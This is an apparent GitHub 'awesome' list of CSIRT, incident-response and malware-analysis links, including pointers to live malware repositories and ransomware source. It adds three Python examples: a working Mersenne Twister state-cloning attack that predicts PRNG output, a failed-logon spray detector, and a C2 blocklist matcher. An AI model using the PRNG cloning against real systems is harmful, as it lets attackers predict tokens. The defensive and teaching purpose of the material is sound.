awesome-csirt
CSIRT resource hub
Awesome CSIRT is a curated list of links and resources for security professionals to stay informed on CSIRT daily activities and security best practices.
467 stars, 36 watching, 85 forks
Language: C
Last commit: about 2 months ago
Topics: awesome, awesome-list, csirt, cve, exfiltration, exploits, malware-analysis, pentesting, poc, reverse-engineering, secure-programming, security, threat-intelligence
CSIRT / Books | |||
here | 467 | about 2 months ago | Nice list by |
Practical Cryptography for Developers | |||
The Book of Secret Knowledge | 149,254 | 3 days ago | |
Security Engineering | — Third Edition | ||
The Cyber Plumber's Handbook | |||
CSIRT / Links | |||
FIRST | |||
CSIRT / Links / FIRST | |||
Malware Analysis Resources | |||
CSIRT / Links | |||
Cert.BR | useful | ||
CSIRT / Links / Cert.BR | |||
7º Fórum Brasileiro de CSIRTs (7th Brazilian CSIRT Forum) | |||
9º Fórum Brasileiro de CSIRTs (9th Brazilian CSIRT Forum) | |||
CSIRT / Links | |||
SANS Pen-Testing Resources: Downloads | |||
list | 467 | about 2 months ago | Some security projects |
APT & CyberCriminal Campaign Collection | 3,723 | 4 months ago | |
Encoding vs. Encryption vs. Hashing vs. Obfuscation | |||
Shodan | : is the world's first search engine for Internet-connected devices | ||
CriminalIP | : Criminal IP is a specialized Cyber Threat Intelligence (CTI) search engine that allows users to search for various security-related information such as malicious IP addresses, domains, banners, etc. It can be widely integrated | ||
hacking-tutorials | 326 | over 3 years ago | |
crypto | 512 | 12 months ago | : Lecture notes for a course on cryptography |
tink | 13,499 | 7 months ago | : Tink is a multi-language, cross-platform library that provides cryptographic APIs that are secure, easy to use correctly, and hard(er) to misuse |
SPLOITUS | : Exploit search engine | ||
Vulmon | : Vulmon is a vulnerability search engine | ||
CIS SecureSuite® Membership | |||
CRYPTO101 | : Crypto 101 is an introductory course on cryptography, freely available for programmers of all ages and skill levels | ||
SMHasher | 1,850 | about 1 month ago | is a test suite designed to test the distribution, collision, and performance properties of non-cryptographic hash functions |
CPDoS | : Cache Poisoned Denial of Service | ||
cacao | 28 | 10 months ago | : OASIS CACAO TC: Official repository for work of the |
cti-documentation | 94 | 25 days ago | |
The 4th in the 5th: Temporal Aspects of Cyber Operations | |||
SOCless | : | ||
Open CSIRT Foundation | and | ||
Global Forum on Cyber Expertise (GFCE) | |||
Ten strategies of a world-class cybersecurity operations center | |||
my-infosec-awesome | 1,062 | 7 months ago | |
How to Secure Anything | 9,941 | over 1 year ago | . How to systematically secure anything: a repository about security engineering |
Metasploitable3 | 4,764 | 5 months ago | : is a VM that is built from the ground up with a large amount of security vulnerabilities |
Institute for Security and Technology | : builds solutions to enhance the security of the global commons. Our goal is to provide the tools and insights needed for companies and governments to outpace emerging global security threats. Our non-traditional approach has a bias towards action, as we build trust across domains, provide unprecedented access, and deliver and implement solutions | ||
NIST'S CYBERSECURITY FRAMEWORK | |||
pluto-eris | 33 | over 3 years ago | : Generator and supporting evidence for security of the Pluto/Eris half-pairing cycle of elliptic curves |
cset | 1,456 | 7 days ago | : Cybersecurity Evaluation Tool by CISA.gov |
comply | 1,319 | over 2 years ago | : Compliance automation framework, focused on SOC2 |
Illustrated X.509 Certificate | |||
Open Security Controls Assessment Language (OSCAL) | 674 | 7 days ago | : NIST is developing the Open Security Controls Assessment Language (OSCAL), a set of hierarchical, XML-, JSON-, and YAML-based formats that provide standardized representations of information pertaining to the publication, implementation, and assessment of security controls |
DWF | : The DWF Identifiers dataset, distributed weakness filing | ||
OASIS Common Security Advisory Framework (CSAF) | |||
notrandom | 71 | over 2 years ago | : reverse the Mersenne Twister |
OpenEX | : Crisis drills planning platform | ||
NCSI | : The National Cyber Security Index is a global index, which measures the preparedness of countries to prevent cyber threats and manage cyber incidents | ||
THE EVOLUTION OF TRUST | |||
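The notrandom entry above describes reversing the Mersenne Twister. The following is an added example, not code from notrandom or from any project in this list, showing the technique against CPython's `random` module: invert the MT19937 output tempering on 624 consecutive 32-bit outputs, load the recovered words as a state array, and predict what the victim generator produces next. The seed and the number of observed outputs in `demo()` are arbitrary constructed values.

```python
import random

MASK32 = 0xFFFFFFFF
N = 624  # MT19937 state size in 32-bit words


def temper(y):
    """MT19937 output tempering, i.e. what getrandbits(32) applies to a raw state word."""
    y ^= y >> 11
    y ^= (y << 7) & 0x9D2C5680
    y ^= (y << 15) & 0xEFC60000
    y ^= y >> 18
    return y & MASK32


def _undo_right_shift_xor(y, shift):
    # Invert y ^= y >> shift. The top `shift` bits are untouched by the xor,
    # so re-applying it with the partially recovered value fixes one more
    # `shift`-bit chunk per round, from the top down.
    x = y
    for _ in range(32 // shift + 1):
        x = y ^ (x >> shift)
    return x & MASK32


def _undo_left_shift_xor(y, shift, mask):
    # Invert y ^= (y << shift) & mask, chunk by chunk from the low bits up.
    x = y
    for _ in range(32 // shift + 1):
        x = y ^ ((x << shift) & mask)
    return x & MASK32


def untemper(y):
    """Invert temper(): recover the raw state word behind one 32-bit output."""
    y = _undo_right_shift_xor(y, 18)
    y = _undo_left_shift_xor(y, 15, 0xEFC60000)
    y = _undo_left_shift_xor(y, 7, 0x9D2C5680)
    y = _undo_right_shift_xor(y, 11)
    return y


def clone_generator(outputs):
    """Rebuild a random.Random whose future outputs match the observed stream.

    `outputs` must hold at least 624 consecutive getrandbits(32) values. Any
    624-word window of the stream is a valid MT state, so the last window is
    loaded with index 624, which makes the next call perform the twist.
    """
    if len(outputs) < N:
        raise ValueError("need at least 624 consecutive 32-bit outputs")
    state = tuple(untemper(o) for o in outputs[-N:]) + (N,)
    clone = random.Random()
    clone.setstate((3, state, None))  # version 3 is CPython's MT state layout
    return clone


def demo(seed=0xC5187, observe=N, predict=8):
    """Constructed scenario: observe a victim PRNG, clone it, predict its next outputs."""
    victim = random.Random(seed)  # seed is an arbitrary constructed value
    observed = [victim.getrandbits(32) for _ in range(observe)]
    clone = clone_generator(observed)
    predicted = [clone.getrandbits(32) for _ in range(predict)]
    actual = [victim.getrandbits(32) for _ in range(predict)]
    return predicted, actual


if __name__ == "__main__":
    predicted, actual = demo()
    print("prediction correct:", predicted == actual)
```

Any 624 consecutive outputs work, not only the first block after seeding, because each new MT word depends only on the words 624, 623 and 227 positions back, so a window of the output stream is a complete state. Note that `random.random()` consumes two 32-bit words per call and discards bits (`>> 5` and `>> 6`), so attacking it requires recovering those raw words rather than feeding its floats in directly.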
CSIRT / Links / Incident Response | |||
Applying DevOps Principles in Incident Response | |||
Pagerduty Incident Response | : This documentation covers parts of the PagerDuty Incident Response process | ||
CSIRT / Links / Incident Response / Pagerduty Incident Response | |||
security-training | 411 | over 1 year ago | : Public version of PagerDuty's employee security training courses |
incident-response-docs | 1,022 | about 1 year ago | : PagerDuty's Incident Response Documentation |
CSIRT / Links / Incident Response | |||
global-irt | 64 | 11 months ago | : Global IRT (Incident Response Team) is a project to describe common IRT and abuse contact information |
atc-react | 613 | over 2 years ago | : A knowledge base of actionable Incident Response techniques |
Request Tracker for Incident Response | |||
Request Tracker | |||
Beagle | 1,272 | almost 2 years ago | is an incident response and digital forensics tool which transforms security logs and data into graphs |
CSIRT Schiltron: Training, Techniques, and Talent | |||
Practical Tabletop Drills for CSIRTS - Pre-session Material | |||
DFIRTrack | 482 | 3 months ago | : The Incident Response Tracking Application |
FIR | 1,734 | 23 days ago | (Fast Incident Response): is a cybersecurity incident management platform designed with agility and speed in mind |
Aurora Incident Response | 766 | about 1 year ago | : Incident Response Documentation made easy. Developed by Incident Responders for Incident Responders |
timesketch | 2,615 | 14 days ago | : Collaborative forensic timeline analysis |
FastIR Collector Linux | 173 | almost 4 years ago | (no longer maintained) |
Critical Log Review Checklist for Security Incidents | |||
Exercise in a Box | |||
Incident response overview | |||
How to Write and Execute Great Incident Response Playbooks | |||
Incident Response: Windows Cheatsheet | |||
Incident Response: Windows Account Logon and Logon Events | |||
Incident Response: Windows Account Management Event (Part 2) | |||
Incident Response- Linux Cheatsheet | |||
Building Better CSIRTs Using Behavioral Psychology | |||
The features all Incident Response Plans need to have | |||
Maltrail | 6,535 | 5 days ago | : Malicious traffic detection system |
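The Windows cheat sheets above cover the 4624/4625 logon events. As an added example, not taken from any of the linked pages, here is a small correlation pass over constructed Security-log records: it keeps a sliding window of 4625 failures per source address, raises a password-spray or brute-force alert once the window crosses a threshold, and escalates a 4624 success that follows such a burst. The event records, the source address 203.0.113.50 and the thresholds are constructed for the example; the sub-status codes are the documented Windows values.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Well-known 4625 sub-status codes from the Windows Security audit documentation
SUBSTATUS = {
    "0xC000006A": "wrong password",
    "0xC0000064": "user name does not exist",
    "0xC0000234": "account locked out",
    "0xC0000072": "account disabled",
    "0xC000006F": "outside authorized logon hours",
}
LOGON_TYPE = {2: "Interactive", 3: "Network", 10: "RemoteInteractive"}

# Constructed Security-log records with the fields of events 4624/4625; not real data.
# 203.0.113.50 is an RFC 5737 documentation address standing in for an external attacker.
EVENTS = [
    {"time": "2024-03-01T08:00:01", "id": 4625, "user": "alice", "ip": "203.0.113.50", "logon_type": 3, "substatus": "0xC000006A"},
    {"time": "2024-03-01T08:00:04", "id": 4625, "user": "bob", "ip": "203.0.113.50", "logon_type": 3, "substatus": "0xC000006A"},
    {"time": "2024-03-01T08:00:07", "id": 4625, "user": "carol", "ip": "203.0.113.50", "logon_type": 3, "substatus": "0xC0000064"},
    {"time": "2024-03-01T08:00:10", "id": 4625, "user": "dave", "ip": "203.0.113.50", "logon_type": 3, "substatus": "0xC000006A"},
    {"time": "2024-03-01T08:00:13", "id": 4625, "user": "erin", "ip": "203.0.113.50", "logon_type": 3, "substatus": "0xC000006A"},
    {"time": "2024-03-01T08:00:20", "id": 4624, "user": "erin", "ip": "203.0.113.50", "logon_type": 3},
    {"time": "2024-03-01T08:05:00", "id": 4625, "user": "alice", "ip": "10.0.1.15", "logon_type": 2, "substatus": "0xC000006A"},
    {"time": "2024-03-01T08:05:06", "id": 4624, "user": "alice", "ip": "10.0.1.15", "logon_type": 2},
]


def describe_failure(ev):
    """Human-readable line for one 4625 record, decoding logon type and sub-status."""
    logon = LOGON_TYPE.get(ev["logon_type"], ev["logon_type"])
    reason = SUBSTATUS.get(ev.get("substatus"), ev.get("substatus"))
    return f"{ev['user']} from {ev['ip']} ({logon}): {reason}"


def detect(events, window=timedelta(minutes=5), threshold=5):
    """Sliding-window correlation of 4625/4624 records per source IP; returns alerts."""
    failures = defaultdict(deque)  # ip -> deque of (time, user) still inside the window
    flagged = set()                # ips that already raised a failure-burst alert
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        q = failures[ev["ip"]]
        while q and t - q[0][0] > window:
            q.popleft()
        if ev["id"] == 4625:
            q.append((t, ev["user"]))
            if len(q) >= threshold and ev["ip"] not in flagged:
                users = {u for _, u in q}
                # many distinct accounts with few tries each is spraying; one account hammered is brute force
                alerts.append({
                    "kind": "password_spray" if len(users) >= 3 else "brute_force",
                    "ip": ev["ip"], "failures": len(q), "users": sorted(users),
                    "first": q[0][0].isoformat(), "last": t.isoformat(),
                })
                flagged.add(ev["ip"])
        elif ev["id"] == 4624 and ev["ip"] in flagged and q:
            # a success from a source that was just hammering accounts is the one to escalate
            alerts.append({
                "kind": "success_after_failures", "ip": ev["ip"], "user": ev["user"],
                "logon_type": LOGON_TYPE.get(ev["logon_type"], ev["logon_type"]),
                "preceding_failures": len(q), "time": t.isoformat(),
            })
    return alerts


if __name__ == "__main__":
    for ev in EVENTS:
        if ev["id"] == 4625:
            print(describe_failure(ev))
    for alert in detect(EVENTS):
        print(alert)
```

The single failed logon from 10.0.1.15 followed by a success is the normal typo case and produces nothing; the burst from 203.0.113.50 produces two alerts, and the second one, the network logon that succeeded for `erin`, is the record to pivot on in the 4624 details (Logon ID, workstation name) when scoping the incident.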
CSIRT / Links / Hashing | |||
MD5 Decryption | |||
SHA-1 is a Shambles | : First Chosen-Prefix Collision on SHA-1 and Application to the PGP Web of Trust | ||
Sha256 Algorithm Explained | |||
CSIRT / CVEs | |||
here | 467 | about 2 months ago | Some CVE-related links and resources (collected here) |
MikroTik | search on shodan | ||
TROMMEL | 6 | over 6 years ago | : Sift Through Directories of Files to Identify Indicators That May Contain Vulnerabilities |
cve_manager | 75 | almost 3 years ago | : A python script that a) parses NIST NVD CVEs, b) processes and exports them to CSV files, c) creates a postgres database and imports all the data into it, d) provides query capabilities for this CVE database |
dorkbot | 512 | 4 months ago | : Command-line tool to scan Google search results for vulnerabilities |
NotQuite0DayFriday | 794 | over 2 years ago | : This is a repo which documents real bugs in real software to illustrate trends, learn how to prevent or find them more quickly |
Exploit Prediction Scoring System (EPSS) | : The Exploit Prediction Scoring System (EPSS) is an open, data-driven effort for predicting when software vulnerabilities will be exploited. Our goal is to assist network defenders to better prioritize vulnerability remediation efforts | ||
CVE PoC | 6,580 | 5 days ago | : Almost every publicly available CVE PoC |
CSIRT / Malware Analysis | |||
Awesome Malware Analysis | 11,989 | 6 months ago | : A curated list of awesome malware analysis tools and resources |
course | Great online by | ||
CS6038/CS5138 Malware Analysis, UC | : | ||
list | 467 | about 2 months ago | A list of some other botnets |
IKARUS anti.virus and its 9 exploitable kernel vulnerabilities | |||
Digital Certificates Used by Malware | |||
Signed Malware – The Dataset | |||
Malware Sample Sources for Researchers | |||
Indicators: Champing at the Cyberbit | 266 | about 4 years ago | |
Limon - Sandbox for Analyzing Linux Malwares | 389 | over 8 years ago | |
A Dynamic Binary Instrumentation framework based on LLVM | 1,417 | 23 days ago | |
Framework for building Windows malware, written in C++ | 504 | almost 4 years ago | |
binary ninja | |||
Analyzing a New macOS DNS Hijacker: OSX/MaMi | |||
al-khaser | 5,919 | about 2 months ago | A PoC "malware" application with good intentions that aims to stress your anti-malware system: |
Great analysis of mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10 (a Joe Sandbox sample classification) | |||
Chaos: a Stolen Backdoor Rising Again | |||
Malware Indicators of Compromise (IOCs) | 10 | over 1 year ago | |
Puszek | 156 | almost 7 years ago | : Yet another LKM rootkit for Linux. It hooks syscall table |
Joe Sandbox Cloud | 63 | 7 months ago | is a deep malware analysis platform which detects malicious files - API Wrapper |
Cuckoo Sandbox | : Automated Malware Analysis | ||
CBG | 4 | about 5 years ago | : Cuckoo Breeding Ground Hash Table |
EternalGlue part two: A rebuilt NotPetya gets its first execution outside of the lab | |||
Malware web and phishing investigation | by Decent Security | ||
A collection of tools for working with TrickBot | 198 | about 7 years ago | |
Forgot About Default Accounts? No Worries, GoScanSSH Didn’t | |||
makin | 732 | over 5 years ago | reveal anti-debugging and anti-VM tricks |
TESSERACT: Eliminating Experimental Bias in Malware Classification across Space and Time | |||
colental/byob: BYOB (Build Your Own Botnet) | 8,989 | 28 days ago | |
Source Code for Exobot Android Banking Trojan Leaked Online | |||
Ramnit’s Network of Proxy Servers | |||
snake | 217 | over 1 year ago | : a malware storage zoo |
A malware analysis kit for the novice | |||
malware-ioc | 1,647 | 10 days ago | : Indicators of Compromises (IOC) of our various investigations |
pftriage | 77 | over 4 years ago | : Python tool and library to help analyze files during malware triage and analysis |
imaginaryC2 | 443 | about 2 years ago | : Imaginary C2 is a python tool which aims to help in the behavioral (network) analysis of malware. Imaginary C2 hosts an HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads |
When a malware is more complex than the paper. | |||
Vba2Graph | 274 | almost 3 years ago | : Vba2Graph - Generate call graphs from VBA code, for easier analysis of malicious documents |
malwoverview | 2,967 | 9 days ago | : Malwoverview.py is a first response tool to perform an initial and quick triage on either a directory containing malware samples or a specific malware sample |
SECT CTF 2018 :: Gh0st, More Smoked Leet Chicken | |||
What you need to know about “LoJax”—the new, stealthy malware from Fancy Bear | |||
Linux.Malware | 2 | almost 3 years ago | : Additional Material for the Linux Malware Paper |
PHP Malware Examination | |||
Analysis of Linux.Haikai | : inside the source code | ||
Cylance vs. MBRKiller Wiper Malware | |||
Deep Analysis of TrickBot New Module pwgrab | |||
multiscanner | 617 | about 5 years ago | : Modular file scanning/analysis framework |
FCL | 462 | over 3 years ago | : FCL (Fileless Command Lines) - Known command lines of fileless malicious executions |
Mac malware combines EmPyre backdoor and XMRig miner | |||
The Full Guide Understanding Fileless Malware Infections | |||
'Injection' Without Injection | |||
Analysis of Neutrino Bot Sample | (dated 2018-08-27): In this post I analyze a Neutrino Bot sample | ||
pafish | 3,409 | 5 months ago | : Pafish is a demonstration tool that employs several techniques to detect sandboxes and analysis environments in the same way as malware families do |
Thunderstrike2 details | : This is the annotated transcript of our DefCon 23 / BlackHat 2015 talk, which presented the full details of Thunderstrike 2, the first firmware worm for Apple's Macs that can spread via both software and Thunderbolt hardware accessories and writes itself to the boot flash on the system's motherboard | ||
Malboxes | : a Tool to Build Malware Analysis Virtual Machines, | ||
Triton is the world’s most murderous malware, and it’s spreading | |||
Cloak and Dagger — Mobile Malware Techniques Demystified | |||
IceBox | 558 | almost 3 years ago | : Icebox is a Virtual Machine Introspection solution that enables you to stealthily trace and debug any process (kernel or user). It's based on project Winbagility |
CSIRT / Malware Analysis / Malware Development: | |||
Welcome to the Dark Side: Part 1 | |||
Welcome to the Dark Side: Part 2-1 | |||
Welcome to the Dark Side: Part 2-2 | |||
Welcome to the Dark Side: Part 3 | |||
Welcome to the Dark Side: Part 4 | |||
CSIRT / Malware Analysis | |||
Command and Control via TCP Handshake | |||
Joe Sandbox Analysis Report for wdeQEksXgm | |||
emotet | : | ||
Aleph | 158 | over 3 years ago | : OpenSource /Malware Analysis Pipeline System |
Aleph | 2 | almost 2 years ago | : File Analysis Pipeline |
Anti-VM Technique with MSAcpi_ThermalZoneTemperature | , | ||
AMSI as a Service | — Automating AV Evasion: AMSI, the “AntiMalware Scan Interface”, has been around for some time. In a broad sense, it’s a component of Windows 10 which allows applications to integrate with AV products, though most people know it for its ability to make file-less malware visible to AV engines | ||
A collection of x64dbg scripts | 500 | 5 months ago | . Feel free to submit a pull request to add your script |
CAPA | 4,885 | 3 days ago | : The FLARE team's open-source tool to identify capabilities in executable files |
DRAKVUF Sandbox | 1,061 | 25 days ago | automated hypervisor-level malware analysis system |
Unprotect | : The Unprotect Project, a knowledge base about malware evasion techniques | ||
HiJackThis Fork v3 | 699 | 7 months ago | : A free utility that finds malware, adware and other security threats |
FRITZFROG | : A NEW GENERATION OF PEER-TO-PEER BOTNETS | ||
Tracking A Malware Campaign Through VT | |||
speakeasy | 1,515 | 7 months ago | : Windows kernel and user mode emulation |
malware analysis and machine learning | |||
GhostDNSbusters | : Illuminating GhostDNS Infrastructure | ||
The Tetrade | : Brazilian banking malware goes global | ||
Is macOS under the biggest malware attack ever? | : EvilQuest/ThiefQuest malware | ||
Hybrid Analysis | |||
Evading Static Machine Learning Malware Detection Models – Part 1: The Black-Box Approach | |||
ember | 949 | about 16 hours ago | : The EMBER dataset is a collection of features from PE files that serve as a benchmark dataset for researchers |
Complementary resources to follow the EHREM course by GoHacking (Malware Reverse Engineering) | 2 | about 4 years ago | |
Coldfire | 934 | 8 months ago | : Golang malware development library |
pei | 30 | about 3 years ago | , the PE Injector - Inject code on 32-bit and 64-bit PE executables |
The Art Of Mac Malware: Analysis | |||
Freki | 422 | 10 months ago | : Malware analysis platform |
Ten process injection techniques: A technical survey of common and trending process injection techniques | |||
Sandbox detection and evasion techniques. How malware has evolved over the last 10 years | |||
malware_training_vol1 | 1,938 | 5 months ago | : Materials for Windows Malware Analysis training (volume 1) |
Go Assembly on the arm64 | |||
Exploit Kit still sharpens a sword | |||
Pingback | : Backdoor At The End Of The ICMP Tunnel | ||
WinAPI-Tricks | : Collection of various WINAPI tricks / features used or abused by Malware | ||
pyWhat | 6,651 | about 1 year ago | : Identify anything. pyWhat easily lets you identify emails, IP addresses, and more. Feed it a .pcap file or some text and it'll tell you what it is! |
Transacted Hollowing | 521 | 9 months ago | : a PE injection technique, hybrid between ProcessHollowing and ProcessDoppelgänging |
Cuckoo Sandbox Overview | |||
Malvuln | : Finding and exploiting vulnerable Malware | ||
Machine Learning for Static Malware Analysis, with University College London | |||
Malware Scarecrow | 379 | about 4 years ago | |
Vigilante malware rats out software pirates while blocking ThePirateBay | |||
Necro Python bot adds new exploits and Tezos mining to its bag of tricks | |||
Too Log; Didn't Read — Unknown Actor Using CLFS Log Files for Stealth | : The Mandiant Advanced Practices team recently discovered a new malware family we have named PRIVATELOG and its installer, STASHLOG | ||
Made in China: OSX.ZuRu | : trojanized apps spread malware, via sponsored search results | ||
DBatLoader: Abusing Discord to Deliver Warzone RAT | |||
Siloscape | : First Known Malware Targeting Windows Containers to Compromise Cloud Environments | ||
DRIDEX | : Analysing API Obfuscation Through VEH | ||
The Return of the Malwarebytes Crackme | , : Writeup and scripts for the 2021 malwarebytes crackme | ||
Corvus | : is a dynamic analysis system for malware targeting Windows, Linux, Android and PDFs. Behavioral heuristics are also applied to identify suspicious activities exhibited by unknown programs | ||
MalAPI.io | maps Windows APIs to common techniques used by malware | ||
Malicious Document Analysis: Example 1 | |||
APIVADS | : A Novel Privacy-Preserving Pivot Attack Detection Scheme Based On Statistical Pattern Recognition | ||
A new secret stash for “fileless” malware | |||
Qu1cksc0pe | 1,320 | 8 days ago | : All-in-One malware analysis tool |
CSIRT / Malware Analysis / Web Malwares | |||
Boa release | is an experimental Javascript lexer, parser and compiler written in Rust | ||
midrashim | 41 | about 3 years ago | : x64 ELF infector written in Assembly |
d0zer | 206 | about 1 year ago | : Elf binary infector written in Go |
New evasion techniques found in web skimmers | |||
digital skimming / #magecart technique for injecting convincing PayPal iframes into the checkout process | |||
CSIRT / Malware Analysis / Malware Samples | |||
Automated Malware Analysis Report for D6pnpvG2z7 | Generated by Joe Sandbox | ||
Mac Malware | |||
virii | 603 | almost 3 years ago | : Collection of ancient computer virus source codes |
Detricking TrickBot Loader | : TrickBot (TrickLoader) is a modular financial malware that first surfaced in October 2016. Almost immediately researchers noticed similarities with a credential-stealer called Dyre. It is still believed that those two families might’ve been developed by the same actor | ||
Analysis of Emotet v4 | |||
abuse.ch Feodo Tracker Botnet C2 IP Blocklist | |||
simple_ransomware | 8 | over 5 years ago | : this script isn't real ransomware; it just collects all your system files and encrypts them, so it can be considered a simple ransomware |
Mirai "Batkek" | |||
FinFisher Filleted 🐟 | , a triage of the FinSpy (macOS) malware | ||
Ryuk’s Return | |||
Ryuk Ransomware | : Extensive Attack Infrastructure Revealed | ||
Collaboration between FIN7 and the RYUK group, a Truesec Investigation | |||
Android-Malware-Samples | 38 | over 7 years ago | : Android Malware Samples |
Architecture of a ransomware | |||
TRAFFIC ANALYSIS EXERCISE - OMEGACAST | |||
Malware Samples | 1,478 | 10 months ago | : Malware samples and other artifacts |
After finding skimmers in SVG files last week, we now discovered a #magecart skimmer in perfectly valid CSS. | |||
#Buer #BuerLoader | |||
SoReL-20M | 638 | over 3 years ago | : Sophos-ReversingLabs 20 million sample dataset |
minizinh0-FUD | 368 | about 3 years ago | : A Fully Undetectable Ransomware |
Purple Fox Rootkit Now Propagates as a Worm | |||
How to analyze mobile malware: a Cabassous/FluBot Case study | |||
Malware Analysis of a Password Stealer | : In this video we dive into the analysis of Poulight malware, which is a .net based password stealer | ||
Guildma | |||
Darkside RaaS in Linux version | |||
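The abuse.ch Feodo Tracker entry above publishes its botnet C2 list as CSV. As an added example, not abuse.ch code, the block below loads a blocklist in that layout, skips the comment header, runs a constructed firewall connection log against it, scores a hit higher when the destination port also matches and the C2 is marked online, and groups the hits by internal host for the incident ticket. The column names, the log format and every address (RFC 5737 documentation ranges for the C2s, RFC 1918 for internal hosts) are constructed assumptions for the example; check the real file's header row before relying on the column order.

```python
import csv
import io
import re
from collections import defaultdict

# Constructed blocklist in the CSV layout Feodo Tracker's botnet C2 IP list uses
# (column names assumed for this example). The addresses are RFC 5737 documentation
# ranges, not real C2 servers.
BLOCKLIST_CSV = """\
################################################################
# Feodo Tracker Botnet C2 IP Blocklist (constructed sample)
################################################################
first_seen_utc,dst_ip,dst_port,c2_status,last_online,malware
2024-01-02 03:04:05,203.0.113.7,443,online,2024-01-08,Dridex
2024-01-05 11:22:33,198.51.100.23,8080,online,2024-01-08,Emotet
2024-01-06 08:00:00,192.0.2.99,447,offline,2024-01-07,TrickBot
"""

# Constructed firewall connection log in a key=value style; internal hosts are RFC 1918.
FIREWALL_LOG = [
    "2024-01-08T09:15:02Z fw1 src=10.0.5.21 dst=203.0.113.7 dport=443 proto=tcp action=allow",
    "2024-01-08T09:15:09Z fw1 src=10.0.5.21 dst=198.51.100.200 dport=443 proto=tcp action=allow",
    "2024-01-08T09:16:40Z fw1 src=10.0.7.3 dst=198.51.100.23 dport=8080 proto=tcp action=allow",
    "2024-01-08T09:17:01Z fw1 src=10.0.7.3 dst=192.0.2.99 dport=80 proto=tcp action=deny",
    "2024-01-08T09:17:05Z fw1 src=10.0.5.21 dst=203.0.113.7 dport=443 proto=tcp action=allow",
]

LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+src=(?P<src>[\d.]+)\s+dst=(?P<dst>[\d.]+)\s+dport=(?P<dport>\d+)")


def load_blocklist(text):
    """Parse the CSV, skipping '#' comment lines; returns {dst_ip: row}."""
    rows = [ln for ln in text.splitlines() if ln and not ln.startswith("#")]
    entries = {}
    for row in csv.DictReader(io.StringIO("\n".join(rows))):
        row["dst_port"] = int(row["dst_port"])
        entries[row["dst_ip"]] = row
    return entries


def parse_log_line(line):
    """Extract timestamp, source, destination and port from one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["dport"] = int(rec["dport"])
    return rec


def scan(lines, blocklist):
    """Match each connection's destination against the blocklist.

    An IP match alone is medium confidence (the host may have been re-used);
    the documented C2 port on an entry still flagged online is high.
    """
    hits = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None or rec["dst"] not in blocklist:
            continue
        entry = blocklist[rec["dst"]]
        port_match = rec["dport"] == entry["dst_port"]
        hits.append({
            "ts": rec["ts"], "src": rec["src"], "dst": rec["dst"], "dport": rec["dport"],
            "malware": entry["malware"], "c2_status": entry["c2_status"], "port_match": port_match,
            "confidence": "high" if port_match and entry["c2_status"] == "online" else "medium",
        })
    return hits


def summarize(hits):
    """Group hits by internal source host: families contacted and connection count."""
    grouped = defaultdict(lambda: {"families": set(), "connections": 0})
    for h in hits:
        grouped[h["src"]]["families"].add(h["malware"])
        grouped[h["src"]]["connections"] += 1
    return {src: {"families": sorted(v["families"]), "connections": v["connections"]}
            for src, v in grouped.items()}


if __name__ == "__main__":
    found = scan(FIREWALL_LOG, load_blocklist(BLOCKLIST_CSV))
    for hit in found:
        print(hit["ts"], hit["src"], "->", hit["dst"], hit["dport"], hit["malware"], hit["confidence"])
    print(summarize(found))
```

Note that the denied connection to the offline TrickBot address is still reported: a blocked attempt is evidence that the internal host is infected, even though the C2 itself is gone.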
CSIRT / Malware Analysis / Repos | |||
A repository of LIVE malwares for your own joy and pleasure | 11,340 | 6 months ago | |
malware.one | is a binary substring searchable malware catalog containing terabytes of malicious code | ||
Beginner Malware Reversing Challenges | , by MalwareTech | ||
MalwareWorld | : Check for Suspicious Domains and IPs. Repo: System based on +500 blacklists and 5 external intelligences to detect internet potentially malicious hosts | ||
C2Matrix | : The goal of this site is to point you to the best C2 framework for your needs based on your adversary emulation plan and the target environment | ||
LOLBITS | 214 | almost 2 years ago | : C2 framework that uses Background Intelligent Transfer Service (BITS) as communication protocol and Direct Syscalls + Dinvoke for EDR user-mode hooking evasion |
MalwareBazaar | : is a project from abuse.ch with the goal of sharing malware samples with the infosec community, AV vendors and threat intelligence providers | ||
What is MWDB Core? | : Malware repository component for samples & static configuration with REST API interface | ||
Malpedia | : The primary goal of Malpedia is to provide a resource for rapid identification and actionable context when investigating malware. Openness to curated contributions shall ensure an accountable level of quality in order to foster meaningful and reproducible research | ||
CSIRT / Malware Analysis / Ransomwares | |||
Ransomware decryption tool | 8 | almost 7 years ago | |
Schroedinger’s Pet(ya) | |||
Player 3 Has Entered the Game: Say Hello to 'WannaCry' | |||
WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm | |||
Ransomware Overview | |||
Analyzing GrandSoft Exploit Kit | and | ||
Rapidly Evolving Ransomware GandCrab Version 5 Partners With Crypter Service for Obfuscation | |||
hidden-tear | 729 | over 4 years ago | : It's a ransomware-like file crypter sample which can be modified for specific purposes |
Tracking REvil | : This blog describes our efforts in tracking the REvil ransomware and its affiliates for the past six months. REvil has been around since 2019 and is one of the top variants of ransomware causing havoc at many organizations around the globe ever since. The KPN Security Research Team was able to acquire C2 sinkholes allowing for the tracking of infections across the globe | ||
Sodinokibi (aka REvil) Ransomware | |||
REvil Master Key for Kaseya Attack Posted to XSS | |||
After the ransom was paid, the attackers even provided some bonus security advice! | |||
Phirautee | 117 | over 4 years ago | : A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares. Phirautee is written purely using PowerShell and does not require any third-party libraries. This tool steals the information, holds an organisation’s data hostage for payments or permanently encrypts/deletes the organisation data |
Sophisticated new Android malware marks the latest evolution of mobile ransomware | |||
Raccine | 944 | about 1 year ago | : A Simple Ransomware Vaccine |
Genetic Analysis of CryptoWall Ransomware | |||
Brazilian Justice Court Ransomware: Another piece in the Puzzle | |||
A Ransomware has landed! @Embraer | by SECRET | ||
RANSOMWARE GUIDANCE AND RESOURCES | |||
No More Ransom! | |||
PYSA/Mespinoza Ransomware | |||
PYSA Ransomware | |||
Mespinoza Analysis — New ransomware variant targets France | |||
Some #PYSA / #Mespinoza #Ransomware Samples | |||
Cerber Ransomware | |||
RansomEXX Trojan attacks Linux systems | |||
FIN7 - Lizar client Interface version 2.0.4 | |||
Introducing COLT – Compromise to Leak Time | |||
